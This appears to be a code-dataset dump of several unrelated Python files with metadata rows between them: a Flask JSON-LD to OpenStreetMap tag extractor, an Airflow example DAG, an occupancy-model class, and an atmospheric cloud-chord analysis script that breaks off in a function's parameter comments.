# collected but previously never written back; OSM joins multiple cuisine values with semicolons
tags['cuisine'] = ';'.join(cuisine)
elif schema_org_type == 'Hotel':
tags['tourism'] = 'hotel'
elif schema_org_type == 'ExerciseGym':
tags['leisure'] = 'fitness_centre'
elif schema_org_type == 'BankOrCreditUnion':
tags['amenity'] = 'bank'
else:
return {}
address = data.get('address', {}).get('streetAddress')
if address:
tags['addr:full'] = address
address = data.get('address', {}).get('addressLocality')
if address:
tags['addr:city'] = address
address = data.get('address', {}).get('addressRegion')
if address:
tags['addr:state'] = address
address = data.get('address', {}).get('postalCode')
if address:
tags['postcode'] = address
address = data.get('address', {}).get('addressCountry')
if address:
tags['addr:country'] = address
brand = data.get('brand')
if brand:
tags['brand'] = brand
name = data.get('name')
if name:
tags['name'] = name
telephone = data.get('telephone')
if telephone:
tags['phone'] = telephone
faxNumber = data.get('faxNumber')
if faxNumber:
tags['fax'] = faxNumber
url = data.get('url')
if url:
tags['website'] = url
return tags
@app.route("/extract")
def extract():
url = request.args.get('url')
if not url:
return jsonify(error="Must specify url parameter"), 400
app.logger.info("Extracting json-ld from %s", url)
r = requests.get(url)
if r.status_code != 200:
app.logger.info("HTTP %s from %s", r.status_code, url)
return jsonify(error="Error fetching url"), 502
base_url = get_base_url(r.text, r.url)
data = extruct.extract(r.text, base_url=base_url, syntaxes=["json-ld"])
data = data.get('json-ld')
output = {}
suggested_tags = {}
for entry in data:
suggested_tags.update(extract_osm_tags(entry))
output = {
'status': {
'url': url,
'success': len(suggested_tags) > 0,
},
'suggested_tags': suggested_tags,
}
if request.args.get('include_extracted', type=bool):
output['extracted'] = data
return jsonify(output)
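With the app running (e.g. via `flask run`), the endpoint maps a page's JSON-LD onto suggested OSM tags; a hypothetical exchange (URL and values illustrative only):

# GET /extract?url=https://example.com/some-restaurant
# -> {"status": {"url": "https://example.com/some-restaurant", "success": true},
#     "suggested_tags": {"amenity": "restaurant", "name": "Example Diner"}}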
| 25.803738
| 75
| 0.589279
| 324
| 2,761
| 4.901235
| 0.302469
| 0.052897
| 0.040932
| 0.066121
| 0.093199
| 0.078086
| 0
| 0
| 0
| 0
| 0
| 0.005429
| 0.266208
| 2,761
| 106
| 76
| 26.04717
| 0.778381
| 0
| 0
| 0.060241
| 0
| 0
| 0.191959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024096
| false
| 0
| 0.048193
| 0
| 0.13253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5cdc3a0f5e46ad0ab740a282e0265f0e1bb27d5 | 702 | py | Python | dags/simple_python_taskflow_api.py | davemasino/airflow101 | f940e169b9c562e3834a201827b615744a99b86d | ["Apache-2.0"] | null | null | null | dags/simple_python_taskflow_api.py | davemasino/airflow101 | f940e169b9c562e3834a201827b615744a99b86d | ["Apache-2.0"] | null | null | null | dags/simple_python_taskflow_api.py | davemasino/airflow101 | f940e169b9c562e3834a201827b615744a99b86d | ["Apache-2.0"] | null | null | null |
"""
A simple Python DAG using the Taskflow API.
"""
import logging
import time
from datetime import datetime
from airflow import DAG
from airflow.decorators import task
log = logging.getLogger(__name__)
with DAG(
dag_id='simple_python_taskflow_api',
schedule_interval=None,
start_date=datetime(2021, 1, 1),
catchup=False,
tags=['airflow101'],
) as dag:
@task(task_id="hello_message")
def say_hello():
"""Print a hello message"""
print("Hello, World!")
hello_task = say_hello()
@task(task_id="go_to_sleep")
def sleep_for_1():
"""Go to sleep"""
time.sleep(1)
sleeping_task = sleep_for_1()
hello_task >> sleeping_task
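The `>>` chaining extends to longer pipelines; a sketch of a third task in the file's own TaskFlow style (task name hypothetical, placed inside the same `with DAG(...)` block):

@task(task_id="goodbye_message")
def say_goodbye():
    """Print a goodbye message"""
    print("Goodbye, World!")

goodbye_task = say_goodbye()
sleeping_task >> goodbye_task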
| 20.057143
| 43
| 0.665242
| 96
| 702
| 4.604167
| 0.458333
| 0.061086
| 0.045249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021858
| 0.217949
| 702
| 34
| 44
| 20.647059
| 0.783242
| 0.109687
| 0
| 0
| 0
| 0
| 0.120264
| 0.042834
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.227273
| 0
| 0.318182
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5cdc4a618ee4e3bc14a1bf765626931e9530f36 | 1,744 | py | Python | pyunmarked/roylenichols.py | kenkellner/pyunmarked | 485bd96b4ca12a019b478fc19f68f577279ac9b8 | ["MIT"] | null | null | null | pyunmarked/roylenichols.py | kenkellner/pyunmarked | 485bd96b4ca12a019b478fc19f68f577279ac9b8 | ["MIT"] | null | null | null | pyunmarked/roylenichols.py | kenkellner/pyunmarked | 485bd96b4ca12a019b478fc19f68f577279ac9b8 | ["MIT"] | null | null | null |
from . import model
import numpy as np
from scipy import special, stats
class RoyleNicholsModel(model.UnmarkedModel):
def __init__(self, det_formula, abun_formula, data):
self.response = model.Response(data.y)
abun = model.Submodel("Abundance", "abun", abun_formula, np.exp, data.site_covs)
det = model.Submodel("Detection", "det", det_formula, special.expit, data.obs_covs)
self.submodels = model.SubmodelDict(abun=abun, det=det)
def negloglik(self, x, mod, K):
x = np.array(x)
beta_abun = x[mod["abun"].index]
beta_det = x[mod["det"].index]
y = mod.response.y
N, J = y.shape
lam = mod["abun"].predict(beta=beta_abun, interval=False)
r = mod["det"].predict(beta=beta_det, interval=False).reshape(N, J)
q = 1 - r
nll = 0.0
for i in range(N):
kvals = range(int(mod.response.Kmin[i]), int(K)+1)
f = stats.poisson.pmf(kvals, lam[i])
ymat = np.tile(y[i,], (len(kvals), 1))
qmat = np.tile(q[i,], (len(kvals), 1))
kmat = np.tile(kvals, (J, 1)).transpose()
pmat = 1 - qmat**kmat
g = stats.binom.logpmf(ymat, 1, pmat).sum(axis=1)
fg = f * np.exp(g)
nll -= np.log(fg.sum())
return nll
def simulate(self):
N, J = self.response.y.shape
lam = self.predict("abun", interval=False)
q = 1 - self.predict("det", interval=False).reshape(N, J)
z = np.random.poisson(lam, N)
zrep = np.tile(z, (J,1)).transpose()
p = 1 - q**zrep
y = np.empty((N, J))
for i in range(N):
y[i,] = np.random.binomial(1, p[i,], J)
return y
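The negative log-likelihood above marginalizes the latent abundance out of the Royle-Nichols model; in formula form (matching the code, with $K^{\min}_i$ the observed lower bound, $K$ the truncation point, and $J$ the number of visits):

$$\mathcal{L}_i = \sum_{N=K^{\min}_i}^{K} \mathrm{Pois}(N;\lambda_i) \prod_{j=1}^{J} \mathrm{Bern}\!\left(y_{ij};\, 1-(1-r_{ij})^{N}\right), \qquad \mathrm{negloglik} = -\sum_i \log \mathcal{L}_i$$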
| 37.913043
| 91
| 0.544151
| 253
| 1,744
| 3.695652
| 0.328063
| 0.010695
| 0.019251
| 0.049198
| 0.079144
| 0.053476
| 0
| 0
| 0
| 0
| 0
| 0.01141
| 0.296445
| 1,744
| 45
| 92
| 38.755556
| 0.750611
| 0
| 0
| 0.04878
| 0
| 0
| 0.026376
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.073171
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5cdf640db99a0e2d2dcf804807be669d9939f1e | 75,933 | py | Python | proc_chords_xarray.py | pgriewank/ASR_tools | 306a7d92725888485a35f8824433ad7b0451b569 | ["MIT"] | null | null | null | proc_chords_xarray.py | pgriewank/ASR_tools | 306a7d92725888485a35f8824433ad7b0451b569 | ["MIT"] | null | null | null | proc_chords_xarray.py | pgriewank/ASR_tools | 306a7d92725888485a35f8824433ad7b0451b569 | ["MIT"] | null | null | null |
#Contains the functions needed to process both chords and regularized beards
# proc_chords is used for chords
#proc_beard_regularize for generating beards
#proc_pdf saves pdfs of a variable below cloud base
#Both have a large overlap, but I split them in two to keep any one script from getting too confusing.
import numpy as np
import math
from netCDF4 import Dataset
import os
import time as ttiimmee
from scipy.interpolate import interp1d
from scipy.interpolate import interp2d
#from scipy.interpolate import griddata
#from mpl_toolkits.axes_grid1 import make_axes_locatable
import pickle
import sys
#sys.path.insert(0, "/home/pgriewank/code/2019-chords-plumes/")
#from unionfind import UnionFind
from cusize_functions import *
#import matplotlib.pyplot as plt
import pandas as pd
import gc
import glob
import xarray as xr
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Full list of variables to analyze is unclear, I will try to include everything available, but this might break the memory bank
#want to keep the automatic x and y calculation
#Scaling shouldn't be needed, as all chord properties should be independent of wind direction (right?)
#Similarly, no basedefinition is needed, all values are relative to cloud base
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#Changing 3D output
#Default is now to always go over x and y directions
#TODO
#plot_flag disabled for the time being
def proc_chords( date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output='/data/testbed/lasso/chords/',
data_dim_flag=1,
base_percentile = 25,
special_name='',
chord_times = 0,
N_it_min=0,
N_it_max=1e9):
# plot_curtains_flag: 0 nothing, 1 plots pre regularization plots, currently disabled
# data_dim_flag: 1 = column, 3 = 3D snapshot
# chord_times: 0 = use Neil's values, 1 = use values that fit the model output exactly, with no gaps allowed
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
# N_it_min = start number of iterables, 3D timesteps or column files. Only really makes sense for 3D, to avoid some weird initial fields.
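# Example call (hypothetical paths), processing only the first ten 3D snapshots:
#   proc_chords(date_str='20160611', data_dim_flag=3, N_it_min=0, N_it_max=10)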
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #should be overwritten after the profile data is loaded
dx = 25.0
date = date_str
n_percentiles = 7 #Number of percentiles
percentiles = np.array([5,10,35,50,65,90,95])
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 1200*100 #Made a 100 times longer
cell_min = 3 #Minimal number of cells needed per chord
# #1D clustering parameters,
#set super strict, but goes on for a loooong time as well
if chord_times == 1:
t_gap = 0. #should be pretty strict, no gaps allowed!
t_min = 0.0
t_max = 1e9
cell_min = 3 #Minimal number of cells needed per chord
ql_min = 1e-5 #value used to determine existence of cloud
z_min = 10 #Index of the minimum z level of the CBL
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
filename_qt = directory_input+date+'/qt.nc'
filename_thl = directory_input+date+'/thl.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
file_thl = Dataset(filename_thl,read='r')
file_qt = Dataset(filename_qt,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
n_chords = 0
#I will try lists first, which I will then convert to arrays in the end before saving in pandas
chord_timesteps = []
chord_length = []
chord_duration = []
chord_time = []
chord_height = [] #percentile of cloud base
chord_w = []
chord_w_up = [] #mean over updrafts
chord_w_base = []
chord_w_star = []
chord_thl_star = []
chord_qt_star = []
chord_thl = []
chord_thl_25 = []
chord_thl_75 = []
chord_qt = []
chord_qt_25 = []
chord_qt_75 = []
chord_w_flux = [] #Sum of w below
#Coming next
chord_w_per = np.zeros([0,n_percentiles])
chord_w_per_up = np.zeros([0,n_percentiles])
#This is now a bit trickier than for the 3D version. We have to calculate a vector at the lower time resolution of the profile,
#then later apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
thl_prof = file_prof['thl'][:,:]
qt_prof = file_prof['qt'][:,:]
nz_prof = w2.shape[1]
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
print('dz: ',dz)
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
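# In formula form (Magnus saturation vapor pressure plus Espy's LCL rule, as coded above):
#   e_s(T) = 611.2 * exp(17.67*(T - 273.15)/(T - 29.65))   [Pa]
#   alpha  = A*(T - 273.15)/(B + (T - 273.15)) + ln(RH),   Td = B*alpha/(A - alpha) + 273.15
#   LCL   ~= 125*(T - Td)   [m]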
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Minimum of LCL+100 or variance-based height plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height higher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
thl_2d = file_col.variables['thl'][:]
thl_2d = thl_2d.transpose()
qt_2d = file_col.variables['qt'][:]
qt_2d = qt_2d.transpose()
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
#lets try saving memory by closing files
#file_col.close()
#The needed cbl height
cbl_1d = t_1d*0
#The needed surface_bouyancy_flux
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d = t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies of thl and qt we subtract the closest mean profile
for tt in range(len(time_prof)):
#globals().update(locals())
tmp_matrix = thl_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = thl_prof[tt,:]
#because the vectors don't perfectly align
thl_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
tmp_matrix = qt_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = qt_prof[tt,:]
#because the vectors don't perfectly align
qt_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
qt_3d = grab_3d_field(file_qt ,it,'qt')
thl_3d = grab_3d_field(file_thl ,it,'thl')
#Here we have to do all the reshaping gymnastics to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
qt_2d = np.array(qt_3d.reshape((nz,nx*ny)))
thl_2d = np.array(thl_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field; this used to be an either/or, now we just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
qt_3d = np.transpose(qt_3d, (0, 2, 1))
thl_3d = np.transpose(thl_3d, (0, 2, 1))
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
thl_2d = np.hstack([thl_2d ,np.array(thl_3d.reshape((nz,nx*ny)))])
qt_2d = np.hstack([qt_2d ,np.array(qt_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del thl_3d
del qt_3d
#hopefully this helps
gc.collect()
#Getting anomalies of thl and qt
qt_2d[:,:] = (qt_2d.transpose() - qt_prof[it,:]).transpose()
thl_2d[:,:] = (thl_2d.transpose() - thl_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which, divided by the grid spacing, gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, str(V_ref)[:4], str(time_resolution)[:4] )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
#dt_1d = t_1d*0
#dt_1d[1:] = t_1d[1:]-t_1d[:-1]
else:
#If no clouds are present we pass a very short empty field over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
thl_2d = np.zeros((nz,1))
qt_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which is constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Used to have a different method using NaNs that doesn't work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>1e-6)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find cloud base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
### Clustering 1D
#Now we simply go through all cloudy timesteps and detect chords
#If they fulfill the chord time requirements and have a number of values which fulfills cell_min they are counted as a chord
#and their properties are calculated immediately
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
chord_idx_list = []
while t_cloudy_idx < len(cbl_cl_idx)-1:# and n_curtain<100*it: ####################################GO HERE TO SET MAXIMUM CURTAIN
#print(t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
#Originally only cared if they fulfilled cloud criteria, but now I also hard coded that neighboring cells always count
##Check if the index of the next cloudy cell is the same as the next index in total, if so the cells are connected
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#Checking if it fulfills the chord criteria regarding time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
ch_duration = 0
if ch_duration>t_min and ch_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_chord_end]))
#list of relevant chord indexes
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
### Now appending chord properties
chord_timesteps.append(t_chord_end-t_chord_begin)
chord_duration.append(ch_duration)
chord_length.append(ch_duration*V_ref)
tmp_base_height = np.percentile(cl_base[ch_idx_l],base_percentile)*dz
chord_height.append(tmp_base_height) #25th percentile of cloud base
surf_b_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
w_star = (tmp_base_height*surf_b_flux)**(1./3.)
surf_qt_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
qt_star = surf_qt_flux/w_star
surf_thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
thl_star = surf_thl_flux/w_star
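# Deardorff convective scales, as computed above:
#   w* = (z_base * <w'b'>_s)^(1/3),  thl* = <w'thl'>_s / w*,  qt* = <w'qt'>_s / w*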
chord_w_star.append(w_star )
chord_thl_star.append(thl_star )
chord_qt_star.append(qt_star )
chord_w_base.append(np.mean(w_2d[cl_base[ch_idx_l],ch_idx_l]))
chord_w.append(np.mean(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_thl.append(np.mean(thl_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
#get a fourth and 3/4 of the cloud base
cl_base_25_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)/4.)
cl_base_75_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)*3./4.)
#print ('cl base idx:',np.percentile(cl_base[ch_idx_l],base_percentile),'clbase/4:',cl_base_25_idx[0],'clbase3/4:',cl_base_75_idx[0])
chord_thl_25.append(np.mean(thl_2d[cl_base_25_idx,ch_idx_l]))
chord_thl_75.append(np.mean(thl_2d[cl_base_75_idx,ch_idx_l]))
chord_qt.append(np.mean(qt_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_qt_75.append(np.mean(qt_2d[cl_base_75_idx,ch_idx_l]))
chord_qt_25.append(np.mean(qt_2d[cl_base_25_idx,ch_idx_l]))
chord_w_flux.append(np.sum(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
w_base_vec = w_2d[cl_base[ch_idx_l]-1,ch_idx_l]
chord_w_up.append(np.mean(w_base_vec[w_base_vec>0.0]))
tmp_w_per = np.percentile(w_base_vec,percentiles)
if len(w_base_vec[w_base_vec>0.0])>0:
tmp_w_per_up = np.percentile(w_base_vec[w_base_vec>0.0],percentiles)
else:
tmp_w_per_up = np.zeros(n_percentiles)
tmp_w_per_up[:] = 'nan'
chord_w_per = np.vstack([chord_w_per,tmp_w_per])
chord_w_per_up = np.vstack([chord_w_per,tmp_w_per_up])
if data_dim_flag==1:
chord_time.append(np.mean(t_1d[ch_idx_l]))
if data_dim_flag==3:
chord_time.append(time_prof[it])
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('iterable: ',it)
print('n_chords: ',n_chords)
print('number of time points included: ',len(cbl_cl_idx))
#Does it matter if I turn these from lists to arrays? Doing it anyway.
chord_timesteps=np.asarray(chord_timesteps)
chord_duration =np.asarray(chord_duration)
chord_length =np.asarray(chord_length)
chord_height =np.asarray(chord_height)
chord_w_base =np.asarray(chord_w_base)
chord_w_star =np.asarray(chord_w_star)
chord_thl_star =np.asarray(chord_thl_star)
chord_qt_star =np.asarray(chord_qt_star)
chord_w =np.asarray(chord_w)
chord_w_up =np.asarray(chord_w_up)
chord_w_flux =np.asarray(chord_w_flux)
chord_thl =np.asarray(chord_thl)
chord_thl_25 =np.asarray(chord_thl_25)
chord_thl_75 =np.asarray(chord_thl_75)
chord_qt =np.asarray(chord_qt)
chord_qt_25 =np.asarray(chord_qt_25)
chord_qt_75 =np.asarray(chord_qt_75)
chord_time =np.asarray(chord_time)
#Saving
print('all chords: ',len(chord_duration))
save_string_base = 'chord_prop_'+date+'_d'+str(data_dim_flag)+'_ct'+str(chord_times)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_chords)
filename_chord_panda = directory_output+save_string_base+'.pkl'
data_for_panda = list(zip(chord_timesteps,chord_duration,chord_length,chord_height,chord_w_base,chord_w,chord_w_flux,chord_time,chord_w_up,chord_w_per,chord_w_per_up,
chord_w_star,chord_thl_star,chord_qt_star,
chord_thl,chord_thl_25,chord_thl_75,chord_qt,chord_qt_25,chord_qt_75))
df = pd.DataFrame(data = data_for_panda, columns=['timesteps','duration','length','height','w_base','w','w_flux','time','w up','w per','w per up',
'w star','thl star','qt star',
'thl','thl 25','thl 75','qt','qt 25','qt 75'])
df.to_pickle(filename_chord_panda)
time_end = ttiimmee.time()
print('total run time of proc_chords in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print('chordlength properties saved as panda in ',filename_chord_panda)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#If the input data is a 3D field it will always go over x and y directions
#Two different scale_flags added to rotate the curtain to point upwind.
#TODO
#plot_flag disabled for the time being
def proc_beard_regularize(reg_var = 'w',
date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output = 'data_curtains/',
data_dim_flag=1,
base_smoothing_flag=2,
plot_curtains_flag = 0,
base_percentile = 25,
special_name='',
scale_flag=2,
chord_times = 0,
anomaly_flag = 0,
N_it_max=1e9,
N_it_min=0,
size_bin_flag=0,
N_bins=12,
bin_size = 250,
curtain_extra = 1.0,
chord_max = 1e9,
boundary_scaling_flag = 0
):
# reg_var = variable that will be regularized
# plot_curtains_flag: 0 nothing, 1 plots pre and post regularization plots of reg_var
# data_dim_flag: 1 = column, 3 = 3D snapshot
# time_slice_curtain: 0 only puts out the total sums, 1: adds a separate output for each time slice, is needed for scale_flag
# scale_flag: If 0, nothing, if 1, it scales the output by u/sqrt(u^2+v^2) and flips the vector if u>0. Is set to 0 if data_dim_flag==1
# 1 the ref_lvl used is determined from the mean cloud base height
# 2, similar to 1 but now using a profile
#
# base_smoothing_flag: 0: use a mix of percentile and cloud base as done by Neil, 1: smooth out the base after setting it with a running average, 2: just use the percentile defined by base_percentile
# base_percentile: percentile used to find chordlength bottom
# chord_times: 0 = use Neil's values, 1 = use values that fit the model output exactly, with no gaps allowed
# anomaly_flag: 0 use reg_var as it is. 1 use reg_var - profile. Works easiest for 3d output, the 1d flag needs to use the closest mean profile
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
# size_bin_flag bins the beards by their chord_length. Currently using 8 bins of 250 meters length to get started. The lowest bin should be empty, because we only calculate curtains when at least curtain_min is used
# curtain_extra: Regularized chord length before and after in the curtain, default is 1
# chord_max: Maximum number of chords. If data_dim_flag=3 it will jump to the y direction when chord_max/2 is reached
